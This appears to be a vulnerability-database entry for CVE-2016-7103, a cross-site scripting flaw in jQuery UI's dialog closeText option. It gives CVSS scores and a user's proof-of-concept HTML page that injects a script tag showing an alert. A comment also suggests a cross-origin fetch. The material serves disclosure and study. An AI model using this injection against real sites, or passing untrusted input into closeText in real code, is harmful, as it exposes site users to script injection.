Attacker Value
Low
(1 user assessed)
Exploitability
High
(1 user assessed)
User Interaction
Required
Privileges Required
None
Attack Vector
Network
1

CVE-2016-7103

Disclosure Date: March 15, 2017
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Discovery
Techniques
Validation
Validated
Validated
Validated
Execution
Techniques
Validation
Validated
Validated
Initial Access
Techniques
Validation
Validated

Description

Cross-site scripting (XSS) vulnerability in jQuery UI before 1.12.0 might allow remote attackers to inject arbitrary web script or HTML via the closeText parameter of the dialog function.

Add Assessment

2
Ratings
Technical Analysis

PoC:

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>XSS in closeText option of component ui dialog</title>

<script src="https://code.jquery.com/jquery-2.1.4.js"></script>
<script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>
<link rel="stylesheet" type="text/css" href="http://code.jquery.com/ui/1.9.1/themes/base/jquery-ui.css">


<script>

$(document).ready(function ()

   {
    $('#dialog').dialog({ closeText: '<script>alert("XSS")<\/script>' });      // This is the attack point where you can inject code 

// if the CORS/CSP policy is not configured or setup wrong, try an jQuery vuln using $.ajax(’https://www.msn.com/robots.txt’);
// if it says onready:1 expand it you should see msn.com’s robots file
// this is a doublewammy of vulnerability in the target

   }
                );
</script>

</head>
<body>

<div id="dialog" title="Dialog Title">Content here!</div>

</body>
</html>

Positives: Easy, can potentially execute scripts off remote sites
Negatives: Would likely require user intervention social engineer or phishing to make this persistant or of real use

Document on how the dialog function is used in jQuery – https://www.tutorialspoint.com/jqueryui/jqueryui_dialog.htm

Here is a link to a site that will prove which jquery exploits are vuln. to which version (specific to jQuery not UI) – https://research.insecurelabs.org/jquery/test/
More info on exploit and poc: https://vuldb.com/?id.98137

dj substance
https://tranceattic.com

CVSS V3 Severity and Metrics
Base Score:
6.1 Medium
Impact Score:
2.7
Exploitability Score:
2.8
Vector:
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
Required
Scope (S):
Changed
Confidentiality (C):
Low
Integrity (I):
Low
Availability (A):
None

General Information

Exploited in the Wild

Reported by:
Reported: February 24, 2021 8:16pm UTC (1 month ago)

References

Advisory

Additional Info

Technical Analysis